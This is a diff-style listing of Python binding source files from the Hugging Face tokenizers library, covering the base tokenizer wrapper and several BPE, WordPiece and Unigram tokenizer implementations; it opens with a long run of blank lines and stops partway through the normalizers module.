 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/__init__.py
2
+ from enum import Enum
3
+ from typing import List, Tuple, Union
4
+ Offsets = Tuple[int, int]
5
+ TextInputSequence = str
6
+ ''
7
+ PreTokenizedInputSequence = Union[List[str], Tuple[str]]
8
+ ''
9
+ TextEncodeInput = Union[TextInputSequence, Tuple[TextInputSequence, TextInputSequence], List[TextInputSequence]]
10
+ ''
11
+ PreTokenizedEncodeInput = Union[PreTokenizedInputSequence, Tuple[PreTokenizedInputSequence, PreTokenizedInputSequence], List[PreTokenizedInputSequence]]
12
+ ''
13
+ InputSequence = Union[TextInputSequence, PreTokenizedInputSequence]
14
+ ''
15
+ EncodeInput = Union[TextEncodeInput, PreTokenizedEncodeInput]
16
+ ''
17
+
18
+ class OffsetReferential(Enum):
19
+ ORIGINAL = 'original'
20
+ NORMALIZED = 'normalized'
21
+
22
+ class OffsetType(Enum):
23
+ BYTE = 'byte'
24
+ CHAR = 'char'
25
+
26
+ class SplitDelimiterBehavior(Enum):
27
+ REMOVED = 'removed'
28
+ ISOLATED = 'isolated'
29
+ MERGED_WITH_PREVIOUS = 'merged_with_previous'
30
+ MERGED_WITH_NEXT = 'merged_with_next'
31
+ CONTIGUOUS = 'contiguous'
32
+ from .tokenizers import AddedToken, Encoding, NormalizedString, PreTokenizedString, Regex, Token, Tokenizer, decoders, models, normalizers, pre_tokenizers, processors, trainers, __version__
33
+ from .implementations import BertWordPieceTokenizer, ByteLevelBPETokenizer, CharBPETokenizer, SentencePieceBPETokenizer, SentencePieceUnigramTokenizer
34
+
35
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/decoders/__init__.py
36
+ from .. import decoders
37
+ Decoder = decoders.Decoder
38
+ ByteLevel = decoders.ByteLevel
39
+ Replace = decoders.Replace
40
+ WordPiece = decoders.WordPiece
41
+ ByteFallback = decoders.ByteFallback
42
+ Fuse = decoders.Fuse
43
+ Strip = decoders.Strip
44
+ Metaspace = decoders.Metaspace
45
+ BPEDecoder = decoders.BPEDecoder
46
+ CTC = decoders.CTC
47
+ Sequence = decoders.Sequence
48
+
49
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/base_tokenizer.py
50
+ from typing import Dict, List, Optional, Tuple, Union
51
+ from tokenizers import AddedToken, EncodeInput, Encoding, InputSequence, Tokenizer
52
+ from tokenizers.decoders import Decoder
53
+ from tokenizers.models import Model
54
+ from tokenizers.normalizers import Normalizer
55
+ from tokenizers.pre_tokenizers import PreTokenizer
56
+ from tokenizers.processors import PostProcessor
57
+ Offsets = Tuple[int, int]
58
+
59
+ class BaseTokenizer:
60
+
61
+ def __init__(self, tokenizer: Tokenizer, parameters=None):
62
+ self._tokenizer = tokenizer
63
+ self._parameters = parameters if parameters is not None else {}
64
+
65
+ def __repr__(self):
66
+ return 'Tokenizer(vocabulary_size={}, {})'.format(self._tokenizer.get_vocab_size(), ', '.join((k + '=' + str(v) for (k, v) in self._parameters.items())))
67
+
68
+ def num_special_tokens_to_add(self, is_pair: bool) -> int:
69
+ return self._tokenizer.num_special_tokens_to_add(is_pair)
70
+
71
+ def get_vocab(self, with_added_tokens: bool=True) -> Dict[str, int]:
72
+ return self._tokenizer.get_vocab(with_added_tokens=with_added_tokens)
73
+
74
+ def get_added_tokens_decoder(self) -> Dict[int, AddedToken]:
75
+ return self._tokenizer.get_added_tokens_decoder()
76
+
77
+ def get_vocab_size(self, with_added_tokens: bool=True) -> int:
78
+ return self._tokenizer.get_vocab_size(with_added_tokens=with_added_tokens)
79
+
80
+ def enable_padding(self, direction: Optional[str]='right', pad_to_multiple_of: Optional[int]=None, pad_id: Optional[int]=0, pad_type_id: Optional[int]=0, pad_token: Optional[str]='[PAD]', length: Optional[int]=None):
81
+ return self._tokenizer.enable_padding(direction=direction, pad_to_multiple_of=pad_to_multiple_of, pad_id=pad_id, pad_type_id=pad_type_id, pad_token=pad_token, length=length)
82
+
83
+ def no_padding(self):
84
+ return self._tokenizer.no_padding()
85
+
86
+ @property
87
+ def padding(self) -> Optional[dict]:
88
+ return self._tokenizer.padding
89
+
90
+ def enable_truncation(self, max_length: int, stride: Optional[int]=0, strategy: Optional[str]='longest_first'):
91
+ return self._tokenizer.enable_truncation(max_length, stride=stride, strategy=strategy)
92
+
93
+ def no_truncation(self):
94
+ return self._tokenizer.no_truncation()
95
+
96
+ @property
97
+ def truncation(self) -> Optional[dict]:
98
+ return self._tokenizer.truncation
99
+
100
+ def add_tokens(self, tokens: List[Union[str, AddedToken]]) -> int:
101
+ return self._tokenizer.add_tokens(tokens)
102
+
103
+ def add_special_tokens(self, special_tokens: List[Union[str, AddedToken]]) -> int:
104
+ return self._tokenizer.add_special_tokens(special_tokens)
105
+
106
+ def normalize(self, sequence: str) -> str:
107
+ return self._tokenizer.normalize(sequence)
108
+
109
+ def encode(self, sequence: InputSequence, pair: Optional[InputSequence]=None, is_pretokenized: bool=False, add_special_tokens: bool=True) -> Encoding:
110
+ if sequence is None:
111
+ raise ValueError("encode: `sequence` can't be `None`")
112
+ return self._tokenizer.encode(sequence, pair, is_pretokenized, add_special_tokens)
113
+
114
+ def encode_batch(self, inputs: List[EncodeInput], is_pretokenized: bool=False, add_special_tokens: bool=True) -> List[Encoding]:
115
+ if inputs is None:
116
+ raise ValueError("encode_batch: `inputs` can't be `None`")
117
+ return self._tokenizer.encode_batch(inputs, is_pretokenized, add_special_tokens)
118
+
119
+ def decode(self, ids: List[int], skip_special_tokens: Optional[bool]=True) -> str:
120
+ if ids is None:
121
+ raise ValueError('None input is not valid. Should be a list of integers.')
122
+ return self._tokenizer.decode(ids, skip_special_tokens=skip_special_tokens)
123
+
124
+ def decode_batch(self, sequences: List[List[int]], skip_special_tokens: Optional[bool]=True) -> str:
125
+ if sequences is None:
126
+ raise ValueError('None input is not valid. Should be list of list of integers.')
127
+ return self._tokenizer.decode_batch(sequences, skip_special_tokens=skip_special_tokens)
128
+
129
+ def token_to_id(self, token: str) -> Optional[int]:
130
+ return self._tokenizer.token_to_id(token)
131
+
132
+ def id_to_token(self, id: int) -> Optional[str]:
133
+ return self._tokenizer.id_to_token(id)
134
+
135
+ def save_model(self, directory: str, prefix: Optional[str]=None):
136
+ return self._tokenizer.model.save(directory, prefix=prefix)
137
+
138
+ def save(self, path: str, pretty: bool=True):
139
+ return self._tokenizer.save(path, pretty)
140
+
141
+ def to_str(self, pretty: bool=False):
142
+ return self._tokenizer.to_str(pretty)
143
+
144
+ def post_process(self, encoding: Encoding, pair: Optional[Encoding]=None, add_special_tokens: bool=True) -> Encoding:
145
+ return self._tokenizer.post_process(encoding, pair, add_special_tokens)
146
+
147
+ @property
148
+ def model(self) -> Model:
149
+ return self._tokenizer.model
150
+
151
+ @model.setter
152
+ def model(self, model: Model):
153
+ self._tokenizer.model = model
154
+
155
+ @property
156
+ def normalizer(self) -> Normalizer:
157
+ return self._tokenizer.normalizer
158
+
159
+ @normalizer.setter
160
+ def normalizer(self, normalizer: Normalizer):
161
+ self._tokenizer.normalizer = normalizer
162
+
163
+ @property
164
+ def pre_tokenizer(self) -> PreTokenizer:
165
+ return self._tokenizer.pre_tokenizer
166
+
167
+ @pre_tokenizer.setter
168
+ def pre_tokenizer(self, pre_tokenizer: PreTokenizer):
169
+ self._tokenizer.pre_tokenizer = pre_tokenizer
170
+
171
+ @property
172
+ def post_processor(self) -> PostProcessor:
173
+ return self._tokenizer.post_processor
174
+
175
+ @post_processor.setter
176
+ def post_processor(self, post_processor: PostProcessor):
177
+ self._tokenizer.post_processor = post_processor
178
+
179
+ @property
180
+ def decoder(self) -> Decoder:
181
+ return self._tokenizer.decoder
182
+
183
+ @decoder.setter
184
+ def decoder(self, decoder: Decoder):
185
+ self._tokenizer.decoder = decoder
186
+
187
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/bert_wordpiece.py
188
+ from typing import Dict, Iterator, List, Optional, Union
189
+ from tokenizers import AddedToken, Tokenizer, decoders, trainers
190
+ from tokenizers.models import WordPiece
191
+ from tokenizers.normalizers import BertNormalizer
192
+ from tokenizers.pre_tokenizers import BertPreTokenizer
193
+ from tokenizers.processors import BertProcessing
194
+ from .base_tokenizer import BaseTokenizer
195
+
196
+ class BertWordPieceTokenizer(BaseTokenizer):
197
+
198
+ def __init__(self, vocab: Optional[Union[str, Dict[str, int]]]=None, unk_token: Union[str, AddedToken]='[UNK]', sep_token: Union[str, AddedToken]='[SEP]', cls_token: Union[str, AddedToken]='[CLS]', pad_token: Union[str, AddedToken]='[PAD]', mask_token: Union[str, AddedToken]='[MASK]', clean_text: bool=True, handle_chinese_chars: bool=True, strip_accents: Optional[bool]=None, lowercase: bool=True, wordpieces_prefix: str='##'):
199
+ if vocab is not None:
200
+ tokenizer = Tokenizer(WordPiece(vocab, unk_token=str(unk_token)))
201
+ else:
202
+ tokenizer = Tokenizer(WordPiece(unk_token=str(unk_token)))
203
+ if tokenizer.token_to_id(str(unk_token)) is not None:
204
+ tokenizer.add_special_tokens([str(unk_token)])
205
+ if tokenizer.token_to_id(str(sep_token)) is not None:
206
+ tokenizer.add_special_tokens([str(sep_token)])
207
+ if tokenizer.token_to_id(str(cls_token)) is not None:
208
+ tokenizer.add_special_tokens([str(cls_token)])
209
+ if tokenizer.token_to_id(str(pad_token)) is not None:
210
+ tokenizer.add_special_tokens([str(pad_token)])
211
+ if tokenizer.token_to_id(str(mask_token)) is not None:
212
+ tokenizer.add_special_tokens([str(mask_token)])
213
+ tokenizer.normalizer = BertNormalizer(clean_text=clean_text, handle_chinese_chars=handle_chinese_chars, strip_accents=strip_accents, lowercase=lowercase)
214
+ tokenizer.pre_tokenizer = BertPreTokenizer()
215
+ if vocab is not None:
216
+ sep_token_id = tokenizer.token_to_id(str(sep_token))
217
+ if sep_token_id is None:
218
+ raise TypeError('sep_token not found in the vocabulary')
219
+ cls_token_id = tokenizer.token_to_id(str(cls_token))
220
+ if cls_token_id is None:
221
+ raise TypeError('cls_token not found in the vocabulary')
222
+ tokenizer.post_processor = BertProcessing((str(sep_token), sep_token_id), (str(cls_token), cls_token_id))
223
+ tokenizer.decoder = decoders.WordPiece(prefix=wordpieces_prefix)
224
+ parameters = {'model': 'BertWordPiece', 'unk_token': unk_token, 'sep_token': sep_token, 'cls_token': cls_token, 'pad_token': pad_token, 'mask_token': mask_token, 'clean_text': clean_text, 'handle_chinese_chars': handle_chinese_chars, 'strip_accents': strip_accents, 'lowercase': lowercase, 'wordpieces_prefix': wordpieces_prefix}
225
+ super().__init__(tokenizer, parameters)
226
+
227
+ @staticmethod
228
+ def from_file(vocab: str, **kwargs):
229
+ vocab = WordPiece.read_file(vocab)
230
+ return BertWordPieceTokenizer(vocab, **kwargs)
231
+
232
+ def train(self, files: Union[str, List[str]], vocab_size: int=30000, min_frequency: int=2, limit_alphabet: int=1000, initial_alphabet: List[str]=[], special_tokens: List[Union[str, AddedToken]]=['[PAD]', '[UNK]', '[CLS]', '[SEP]', '[MASK]'], show_progress: bool=True, wordpieces_prefix: str='##'):
233
+ trainer = trainers.WordPieceTrainer(vocab_size=vocab_size, min_frequency=min_frequency, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, special_tokens=special_tokens, show_progress=show_progress, continuing_subword_prefix=wordpieces_prefix)
234
+ if isinstance(files, str):
235
+ files = [files]
236
+ self._tokenizer.train(files, trainer=trainer)
237
+
238
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=30000, min_frequency: int=2, limit_alphabet: int=1000, initial_alphabet: List[str]=[], special_tokens: List[Union[str, AddedToken]]=['[PAD]', '[UNK]', '[CLS]', '[SEP]', '[MASK]'], show_progress: bool=True, wordpieces_prefix: str='##', length: Optional[int]=None):
239
+ trainer = trainers.WordPieceTrainer(vocab_size=vocab_size, min_frequency=min_frequency, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, special_tokens=special_tokens, show_progress=show_progress, continuing_subword_prefix=wordpieces_prefix)
240
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
241
+
242
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/byte_level_bpe.py
243
+ from typing import Dict, Iterator, List, Optional, Tuple, Union
244
+ from tokenizers import AddedToken, Tokenizer, decoders, pre_tokenizers, processors, trainers
245
+ from tokenizers.models import BPE
246
+ from tokenizers.normalizers import Lowercase, Sequence, unicode_normalizer_from_str
247
+ from .base_tokenizer import BaseTokenizer
248
+
249
+ class ByteLevelBPETokenizer(BaseTokenizer):
250
+
251
+ def __init__(self, vocab: Optional[Union[str, Dict[str, int]]]=None, merges: Optional[Union[str, Dict[Tuple[int, int], Tuple[int, int]]]]=None, add_prefix_space: bool=False, lowercase: bool=False, dropout: Optional[float]=None, unicode_normalizer: Optional[str]=None, continuing_subword_prefix: Optional[str]=None, end_of_word_suffix: Optional[str]=None, trim_offsets: bool=False):
252
+ if vocab is not None and merges is not None:
253
+ tokenizer = Tokenizer(BPE(vocab, merges, dropout=dropout, continuing_subword_prefix=continuing_subword_prefix or '', end_of_word_suffix=end_of_word_suffix or ''))
254
+ else:
255
+ tokenizer = Tokenizer(BPE())
256
+ normalizers = []
257
+ if unicode_normalizer:
258
+ normalizers += [unicode_normalizer_from_str(unicode_normalizer)]
259
+ if lowercase:
260
+ normalizers += [Lowercase()]
261
+ if len(normalizers) > 0:
262
+ if len(normalizers) > 1:
263
+ tokenizer.normalizer = Sequence(normalizers)
264
+ else:
265
+ tokenizer.normalizer = normalizers[0]
266
+ tokenizer.pre_tokenizer = pre_tokenizers.ByteLevel(add_prefix_space=add_prefix_space)
267
+ tokenizer.decoder = decoders.ByteLevel()
268
+ tokenizer.post_processor = processors.ByteLevel(trim_offsets=trim_offsets)
269
+ parameters = {'model': 'ByteLevelBPE', 'add_prefix_space': add_prefix_space, 'lowercase': lowercase, 'dropout': dropout, 'unicode_normalizer': unicode_normalizer, 'continuing_subword_prefix': continuing_subword_prefix, 'end_of_word_suffix': end_of_word_suffix, 'trim_offsets': trim_offsets}
270
+ super().__init__(tokenizer, parameters)
271
+
272
+ @staticmethod
273
+ def from_file(vocab_filename: str, merges_filename: str, **kwargs):
274
+ (vocab, merges) = BPE.read_file(vocab_filename, merges_filename)
275
+ return ByteLevelBPETokenizer(vocab, merges, **kwargs)
276
+
277
+ def train(self, files: Union[str, List[str]], vocab_size: int=30000, min_frequency: int=2, show_progress: bool=True, special_tokens: List[Union[str, AddedToken]]=[]):
278
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, show_progress=show_progress, special_tokens=special_tokens, initial_alphabet=pre_tokenizers.ByteLevel.alphabet())
279
+ if isinstance(files, str):
280
+ files = [files]
281
+ self._tokenizer.train(files, trainer=trainer)
282
+
283
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=30000, min_frequency: int=2, show_progress: bool=True, special_tokens: List[Union[str, AddedToken]]=[], length: Optional[int]=None):
284
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, show_progress=show_progress, special_tokens=special_tokens, initial_alphabet=pre_tokenizers.ByteLevel.alphabet())
285
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
286
+
287
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/char_level_bpe.py
288
+ from typing import Dict, Iterator, List, Optional, Tuple, Union
289
+ from .. import AddedToken, Tokenizer, decoders, pre_tokenizers, trainers
290
+ from ..models import BPE
291
+ from ..normalizers import BertNormalizer, Lowercase, Sequence, unicode_normalizer_from_str
292
+ from .base_tokenizer import BaseTokenizer
293
+
294
+ class CharBPETokenizer(BaseTokenizer):
295
+
296
+ def __init__(self, vocab: Optional[Union[str, Dict[str, int]]]=None, merges: Optional[Union[str, Dict[Tuple[int, int], Tuple[int, int]]]]=None, unk_token: Union[str, AddedToken]='<unk>', suffix: str='</w>', dropout: Optional[float]=None, lowercase: bool=False, unicode_normalizer: Optional[str]=None, bert_normalizer: bool=True, split_on_whitespace_only: bool=False):
297
+ if vocab is not None and merges is not None:
298
+ tokenizer = Tokenizer(BPE(vocab, merges, dropout=dropout, unk_token=str(unk_token), end_of_word_suffix=suffix))
299
+ else:
300
+ tokenizer = Tokenizer(BPE(unk_token=str(unk_token), dropout=dropout, end_of_word_suffix=suffix))
301
+ if tokenizer.token_to_id(str(unk_token)) is not None:
302
+ tokenizer.add_special_tokens([str(unk_token)])
303
+ normalizers = []
304
+ if unicode_normalizer:
305
+ normalizers += [unicode_normalizer_from_str(unicode_normalizer)]
306
+ if bert_normalizer:
307
+ normalizers += [BertNormalizer(lowercase=False)]
308
+ if lowercase:
309
+ normalizers += [Lowercase()]
310
+ if len(normalizers) > 0:
311
+ if len(normalizers) > 1:
312
+ tokenizer.normalizer = Sequence(normalizers)
313
+ else:
314
+ tokenizer.normalizer = normalizers[0]
315
+ if split_on_whitespace_only:
316
+ tokenizer.pre_tokenizer = pre_tokenizers.WhitespaceSplit()
317
+ else:
318
+ tokenizer.pre_tokenizer = pre_tokenizers.BertPreTokenizer()
319
+ tokenizer.decoder = decoders.BPEDecoder(suffix=suffix)
320
+ parameters = {'model': 'BPE', 'unk_token': unk_token, 'suffix': suffix, 'dropout': dropout, 'lowercase': lowercase, 'unicode_normalizer': unicode_normalizer, 'bert_normalizer': bert_normalizer, 'split_on_whitespace_only': split_on_whitespace_only}
321
+ super().__init__(tokenizer, parameters)
322
+
323
+ @staticmethod
324
+ def from_file(vocab_filename: str, merges_filename: str, **kwargs):
325
+ (vocab, merges) = BPE.read_file(vocab_filename, merges_filename)
326
+ return CharBPETokenizer(vocab, merges, **kwargs)
327
+
328
+ def train(self, files: Union[str, List[str]], vocab_size: int=30000, min_frequency: int=2, special_tokens: List[Union[str, AddedToken]]=['<unk>'], limit_alphabet: int=1000, initial_alphabet: List[str]=[], suffix: Optional[str]='</w>', show_progress: bool=True):
329
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, special_tokens=special_tokens, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, end_of_word_suffix=suffix, show_progress=show_progress)
330
+ if isinstance(files, str):
331
+ files = [files]
332
+ self._tokenizer.train(files, trainer=trainer)
333
+
334
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=30000, min_frequency: int=2, special_tokens: List[Union[str, AddedToken]]=['<unk>'], limit_alphabet: int=1000, initial_alphabet: List[str]=[], suffix: Optional[str]='</w>', show_progress: bool=True, length: Optional[int]=None):
335
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, special_tokens=special_tokens, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, end_of_word_suffix=suffix, show_progress=show_progress)
336
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
337
+
338
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/sentencepiece_bpe.py
339
+ from typing import Dict, Iterator, List, Optional, Tuple, Union
340
+ from tokenizers import AddedToken, Tokenizer, decoders, pre_tokenizers, trainers
341
+ from tokenizers.models import BPE
342
+ from tokenizers.normalizers import NFKC
343
+ from .base_tokenizer import BaseTokenizer
344
+
345
+ class SentencePieceBPETokenizer(BaseTokenizer):
346
+
347
+ def __init__(self, vocab: Optional[Union[str, Dict[str, int]]]=None, merges: Optional[Union[str, Dict[Tuple[int, int], Tuple[int, int]]]]=None, unk_token: Union[str, AddedToken]='<unk>', replacement: str='▁', add_prefix_space: bool=True, dropout: Optional[float]=None, fuse_unk: Optional[bool]=False):
348
+ if vocab is not None and merges is not None:
349
+ tokenizer = Tokenizer(BPE(vocab, merges, dropout=dropout, unk_token=unk_token, fuse_unk=fuse_unk))
350
+ else:
351
+ tokenizer = Tokenizer(BPE(dropout=dropout, unk_token=unk_token, fuse_unk=fuse_unk))
352
+ if tokenizer.token_to_id(str(unk_token)) is not None:
353
+ tokenizer.add_special_tokens([str(unk_token)])
354
+ tokenizer.normalizer = NFKC()
355
+ prepend_scheme = 'always' if add_prefix_space else 'never'
356
+ tokenizer.pre_tokenizer = pre_tokenizers.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
357
+ tokenizer.decoder = decoders.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
358
+ parameters = {'model': 'SentencePieceBPE', 'unk_token': unk_token, 'replacement': replacement, 'add_prefix_space': add_prefix_space, 'dropout': dropout}
359
+ super().__init__(tokenizer, parameters)
360
+
361
+ @staticmethod
362
+ def from_file(vocab_filename: str, merges_filename: str, **kwargs):
363
+ (vocab, merges) = BPE.read_file(vocab_filename, merges_filename)
364
+ return SentencePieceBPETokenizer(vocab, merges, **kwargs)
365
+
366
+ def train(self, files: Union[str, List[str]], vocab_size: int=30000, min_frequency: int=2, special_tokens: List[Union[str, AddedToken]]=['<unk>'], limit_alphabet: int=1000, initial_alphabet: List[str]=[], show_progress: bool=True):
367
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, special_tokens=special_tokens, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, show_progress=show_progress)
368
+ if isinstance(files, str):
369
+ files = [files]
370
+ self._tokenizer.train(files, trainer=trainer)
371
+
372
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=30000, min_frequency: int=2, special_tokens: List[Union[str, AddedToken]]=['<unk>'], limit_alphabet: int=1000, initial_alphabet: List[str]=[], show_progress: bool=True, length: Optional[int]=None):
373
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, special_tokens=special_tokens, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, show_progress=show_progress)
374
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
375
+
376
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/sentencepiece_unigram.py
377
+ import json
378
+ import os
379
+ from typing import Iterator, List, Optional, Union, Tuple
380
+ from tokenizers import AddedToken, Regex, Tokenizer, decoders, normalizers, pre_tokenizers, trainers
381
+ from tokenizers.models import Unigram
382
+ from .base_tokenizer import BaseTokenizer
383
+
384
+ class SentencePieceUnigramTokenizer(BaseTokenizer):
385
+
386
+ def __init__(self, vocab: Optional[List[Tuple[str, float]]]=None, replacement: str='▁', add_prefix_space: bool=True):
387
+ if vocab is not None:
388
+ tokenizer = Tokenizer(Unigram(vocab))
389
+ else:
390
+ tokenizer = Tokenizer(Unigram())
391
+ tokenizer.normalizer = normalizers.Sequence([normalizers.Nmt(), normalizers.NFKC(), normalizers.Replace(Regex(' {2,}'), ' ')])
392
+ prepend_scheme = 'always' if add_prefix_space else 'never'
393
+ tokenizer.pre_tokenizer = pre_tokenizers.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
394
+ tokenizer.decoder = decoders.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
395
+ parameters = {'model': 'SentencePieceUnigram', 'replacement': replacement, 'add_prefix_space': add_prefix_space}
396
+ super().__init__(tokenizer, parameters)
397
+
398
+ def train(self, files: Union[str, List[str]], vocab_size: int=8000, show_progress: bool=True, special_tokens: Optional[List[Union[str, AddedToken]]]=None, initial_alphabet: Optional[List[str]]=None, unk_token: Optional[str]=None):
399
+ if special_tokens is None:
400
+ special_tokens = []
401
+ if initial_alphabet is None:
402
+ initial_alphabet = []
403
+ trainer = trainers.UnigramTrainer(vocab_size=vocab_size, special_tokens=special_tokens, show_progress=show_progress, initial_alphabet=initial_alphabet, unk_token=unk_token)
404
+ if isinstance(files, str):
405
+ files = [files]
406
+ self._tokenizer.train(files, trainer=trainer)
407
+
408
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=8000, show_progress: bool=True, special_tokens: Optional[List[Union[str, AddedToken]]]=None, initial_alphabet: Optional[List[str]]=None, unk_token: Optional[str]=None, length: Optional[int]=None):
409
+ if special_tokens is None:
410
+ special_tokens = []
411
+ if initial_alphabet is None:
412
+ initial_alphabet = []
413
+ trainer = trainers.UnigramTrainer(vocab_size=vocab_size, special_tokens=special_tokens, show_progress=show_progress, initial_alphabet=initial_alphabet, unk_token=unk_token)
414
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
415
+
416
+ @staticmethod
417
+ def from_spm(filename: str):
418
+ try:
419
+ import sys
420
+ sys.path.append('.')
421
+ import sentencepiece_model_pb2 as model
422
+ except Exception:
423
+ raise Exception("You don't seem to have the required protobuf file, in order to use this function you need to run `pip install protobuf` and `wget https://raw.githubusercontent.com/google/sentencepiece/master/python/src/sentencepiece/sentencepiece_model_pb2.py` for us to be able to read the intrinsics of your spm_file. `pip install sentencepiece` is not required.")
424
+ m = model.ModelProto()
425
+ m.ParseFromString(open(filename, 'rb').read())
426
+ precompiled_charsmap = m.normalizer_spec.precompiled_charsmap
427
+ vocab = [(piece.piece, piece.score) for piece in m.pieces]
428
+ unk_id = m.trainer_spec.unk_id
429
+ model_type = m.trainer_spec.model_type
430
+ byte_fallback = m.trainer_spec.byte_fallback
431
+ if model_type != 1:
432
+ raise Exception("You're trying to run a `Unigram` model but you're file was trained with a different algorithm")
433
+ replacement = '▁'
434
+ add_prefix_space = True
435
+ tokenizer = Tokenizer(Unigram(vocab, unk_id, byte_fallback))
436
+ if precompiled_charsmap:
437
+ tokenizer.normalizer = normalizers.Sequence([normalizers.Precompiled(precompiled_charsmap), normalizers.Replace(Regex(' {2,}'), ' ')])
438
+ else:
439
+ tokenizer.normalizer = normalizers.Sequence([normalizers.Replace(Regex(' {2,}'), ' ')])
440
+ prepend_scheme = 'always' if add_prefix_space else 'never'
441
+ tokenizer.pre_tokenizer = pre_tokenizers.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
442
+ tokenizer.decoder = decoders.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
443
+ parameters = {'model': 'SentencePieceUnigram'}
444
+ obj = BaseTokenizer.__new__(SentencePieceUnigramTokenizer, tokenizer, parameters)
445
+ BaseTokenizer.__init__(obj, tokenizer, parameters)
446
+ return obj
447
+
448
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/normalizers/__init__.py
449
+ from .. import normalizers
450
+ Normalizer = normalizers.Normalizer
451
+ BertNormalizer = normalizers.BertNormalizer
452
+ NFD = normalizers.NFD
453
+ NFKD = normalizers.NFKD
454
